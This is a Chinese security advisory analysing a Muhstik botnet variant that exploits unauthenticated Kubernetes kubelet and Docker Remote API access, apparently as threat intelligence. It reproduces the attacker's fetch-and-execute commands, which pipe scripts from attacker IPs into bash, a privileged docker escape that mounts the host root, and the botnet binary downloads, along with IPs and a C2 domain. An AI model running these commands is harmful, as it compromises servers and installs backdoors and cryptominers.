【安全资讯】Muhstik僵尸网络变种利用漏洞攻击云服务器

Muhstik僵尸网络新变种利用Kubernetes kubelet API未授权访问漏洞和Docker Remote API未授权访问漏洞攻击云服务器，利用漏洞攻击得手之后，Muhstik会安装IRC后门对失陷系统进行远程控制。随后可下发任意命令执行，包括下载安装挖矿模块、执行DDoS攻击等。

Muhstik僵尸网络在2018年被发现，其早期版本主要利用Drupal RCE漏洞（CVE-2018-7600），WebLogic反序列化RCE漏洞（CVE-2019-2725），WebLogic反序列化RCE漏洞（CVE-2017-10271）以及SSH弱口令爆破攻击传播。

利用Kubernetes Kubelet API未授权访问漏洞

Muhstik僵尸网络通过执行以下命令下载和执行bash脚本“kubepy”进行kubernetes服务扫描和攻击：

sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;wget -qO - hxxp://159.89.91.223/wp-content/themes/twentyseventeen/kubepy | bash > /dev/null 2>&1 &

kubepy安装扫描工具masscan对指定IP范围进行kubernetes服务的10250端口扫描探测。利用Kubelet API未授权访问漏洞对容器节点进行攻击、下载和执行恶意shell脚本。

利用Docker Remote API未授权访问漏洞

Docker Remote API未授权访问漏洞有严重风险，使用docker swarm管理的docker节点上开放一个TCP端口2375，绑定 IP 为： 0.0.0.0， 且暴露在公网上。导致攻击者可以远程管理该主机的 docker 容器，可启动、下载、重启镜像，甚至删除上面的容器。

Muhstik僵尸网络通过执行以下命令下载和执行bash脚本“dock”进行Docker服务扫描和攻击：

sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;wget -qO - hxxp://159.89.91.223/wp-content/themes/twentyseventeen/dock | bash > /dev/null 2>&1 &

针对获取到的攻击目标，利用Docker未授权访问漏洞进行攻击，成功后执行shell脚本d：

timeout -s SIGKILL 240 docker -H tcp://$IPADDR:$PORT run -d --privileged --net host -v /:/mnt alpine sh -c 'wget -qO - hxxp://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null' &

恶意shell脚本

恶意shell脚本负责下载植入muhstik僵尸网络木马dk32/dk86:

wget hxxp://159.89.91.223/.x/dk32 -O dk32; chmod +x dk32 ; chmod 700 dk32 ; ./dk32 &
wget hxxp://159.89.91.223/.x/dk86 -O dk86; chmod +x dk86 ; chmod 700 dk86 ; ./dk86 &

然后通过安装定时任务实现持久化，与IRC C2服务器dkrd.exposedbotnets.ru通信。最后通过执行shell下载XMRig挖矿木马xmra32进行挖矿计算。